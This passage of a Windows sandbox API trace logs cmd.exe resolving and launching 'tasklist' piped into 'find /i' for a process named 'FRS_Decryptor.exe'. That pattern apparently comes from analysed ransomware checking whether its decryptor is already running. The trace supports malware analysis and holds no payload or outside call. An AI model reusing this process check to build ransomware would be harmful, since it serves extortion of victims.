(_String1="tasklist", _String2="SETLOCAL") returned 1 [0101.496] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0101.496] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0101.496] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0101.496] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0101.496] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0101.496] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0101.496] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0101.496] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0101.496] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0101.496] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0101.496] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0101.496] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0101.496] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0101.496] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0101.496] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0101.496] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0101.496] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0101.496] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0101.496] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0101.496] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0101.496] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0101.496] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0101.496] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0101.496] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0101.496] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0101.496] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0101.496] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0101.496] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0101.496] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0101.496] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0101.496] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0101.496] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0101.496] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0101.497] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0101.497] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0101.497] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0101.497] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0101.497] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0101.497] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0101.497] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0101.497] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0101.497] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0101.497] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0101.497] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0101.497] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0101.497] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0101.497] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0101.497] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0101.497] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0101.497] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0101.497] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0101.497] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0101.497] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0101.497] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0101.497] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0101.497] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0101.497] SetErrorMode (uMode=0x0) returned 0x0 [0101.497] SetErrorMode (uMode=0x1) returned 0x0 [0101.497] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb85228, lpFilePart=0x89fac4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x89fac4*="Desktop") returned 0x1c [0101.497] SetErrorMode (uMode=0x0) returned 0x1 [0101.497] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.497] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.501] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.502] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xffffffff [0101.502] GetLastError () returned 0x2 [0101.502] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.502] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xb85530 [0101.502] FindClose (in: hFindFile=0xb85530 | out: hFindFile=0xb85530) returned 1 [0101.502] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xffffffff [0101.502] GetLastError () returned 0x2 [0101.502] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xb85530 [0101.502] FindClose (in: hFindFile=0xb85530 | out: hFindFile=0xb85530) returned 1 [0101.502] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0101.502] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0101.503] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0101.503] SetErrorMode (uMode=0x0) returned 0x0 [0101.503] SetErrorMode (uMode=0x1) returned 0x0 [0101.503] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb8a3c0, lpFilePart=0x89f86c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x89f86c*="Desktop") returned 0x1c [0101.503] SetErrorMode (uMode=0x0) returned 0x1 [0101.503] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.503] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.503] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.503] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xffffffff [0101.503] GetLastError () returned 0x2 [0101.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xb85628 [0101.503] FindClose (in: hFindFile=0xb85628 | out: hFindFile=0xb85628) returned 1 [0101.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xffffffff [0101.503] GetLastError () returned 0x2 [0101.503] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xb85628 [0101.503] FindClose (in: hFindFile=0xb85628 | out: hFindFile=0xb85628) returned 1 [0101.504] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0101.504] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0101.504] GetConsoleTitleW (in: lpConsoleTitle=0x89faf4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.504] InitializeProcThreadAttributeList (in: lpAttributeList=0x89fa20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x89fa04 | out: lpAttributeList=0x89fa20, lpSize=0x89fa04) returned 1 [0101.504] UpdateProcThreadAttribute (in: lpAttributeList=0x89fa20, dwFlags=0x0, Attribute=0x60001, lpValue=0x89fa0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x89fa20, lpPreviousValue=0x0) returned 1 [0101.504] GetStartupInfoW (in: lpStartupInfo=0x89fa58 | out: lpStartupInfo=0x89fa58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0101.504] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0101.505] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0101.505] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0101.506] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x89f9a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x89f9f4 | out: lpCommandLine="tasklist", lpProcessInformation=0x89f9f4*(hProcess=0x64, hThread=0x60, dwProcessId=0x474, dwThreadId=0x830)) returned 1 [0101.509] CloseHandle (hObject=0x60) returned 1 [0101.509] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0101.509] GetEnvironmentStringsW () returned 0xb842d8* [0101.509] FreeEnvironmentStringsA (penv="=") returned 1 [0101.509] DeleteProcThreadAttributeList (in: lpAttributeList=0x89fa20 | out: lpAttributeList=0x89fa20) [0101.509] _get_osfhandle (_FileHandle=3) returned 0x54 [0101.509] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0101.509] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0101.509] _close (_FileHandle=5) returned 0 [0101.509] _dup (_FileHandle=0) returned 4 [0101.509] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0101.509] _close (_FileHandle=3) returned 0 [0101.509] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0101.509] SetErrorMode (uMode=0x0) returned 0x0 [0101.509] SetErrorMode (uMode=0x1) returned 0x0 [0101.509] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb842e0, lpFilePart=0x89fac4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x89fac4*="Desktop") returned 0x1c [0101.509] SetErrorMode (uMode=0x0) returned 0x1 [0101.510] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.510] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.510] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.510] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xffffffff [0101.510] GetLastError () returned 0x2 [0101.510] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xb85628 [0101.510] FindClose (in: hFindFile=0xb85628 | out: hFindFile=0xb85628) returned 1 [0101.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xffffffff [0101.510] GetLastError () returned 0x2 [0101.510] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x89f850, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f850) returned 0xb85628 [0101.510] FindClose (in: hFindFile=0xb85628 | out: hFindFile=0xb85628) returned 1 [0101.510] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0101.511] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0101.511] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0101.511] SetErrorMode (uMode=0x0) returned 0x0 [0101.511] SetErrorMode (uMode=0x1) returned 0x0 [0101.511] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb84668, lpFilePart=0x89f86c | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x89f86c*="Desktop") returned 0x1c [0101.511] SetErrorMode (uMode=0x0) returned 0x1 [0101.511] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0101.511] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0101.511] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0101.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.511] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xffffffff [0101.511] GetLastError () returned 0x2 [0101.511] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0101.511] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xb804a0 [0101.512] FindClose (in: hFindFile=0xb804a0 | out: hFindFile=0xb804a0) returned 1 [0101.512] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xffffffff [0101.512] GetLastError () returned 0x2 [0101.512] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0x89f5f8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x89f5f8) returned 0xb804a0 [0101.512] FindClose (in: hFindFile=0xb804a0 | out: hFindFile=0xb804a0) returned 1 [0101.512] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0101.512] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0101.512] GetConsoleTitleW (in: lpConsoleTitle=0x89faf4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0101.512] InitializeProcThreadAttributeList (in: lpAttributeList=0x89fa20, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x89fa04 | out: lpAttributeList=0x89fa20, lpSize=0x89fa04) returned 1 [0101.512] UpdateProcThreadAttribute (in: lpAttributeList=0x89fa20, dwFlags=0x0, Attribute=0x60001, lpValue=0x89fa0c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x89fa20, lpPreviousValue=0x0) returned 1 [0101.512] GetStartupInfoW (in: lpStartupInfo=0x89fa58 | out: lpStartupInfo=0x89fa58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x260, hStdError=0x2c)) [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0101.512] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0101.513] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0101.513] lstrcmpW (lpString1="\\find.exe", lpString2="\\XCOPY.EXE") returned -1 [0101.513] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\find.exe", lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0x89f9a8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="find /i \"FRS_Decryptor.exe\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x89f9f4 | out: lpCommandLine="find /i \"FRS_Decryptor.exe\"", lpProcessInformation=0x89f9f4*(hProcess=0x60, hThread=0x54, dwProcessId=0x838, dwThreadId=0xb08)) returned 1 [0101.515] CloseHandle (hObject=0x54) returned 1 [0101.515] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0101.515] GetEnvironmentStringsW () returned 0xb8ad78* [0101.516] FreeEnvironmentStringsA (penv="=") returned 1 [0101.516] DeleteProcThreadAttributeList (in: lpAttributeList=0x89fa20 | out: lpAttributeList=0x89fa20) [0101.516] _dup2 (_FileHandleSrc=4, 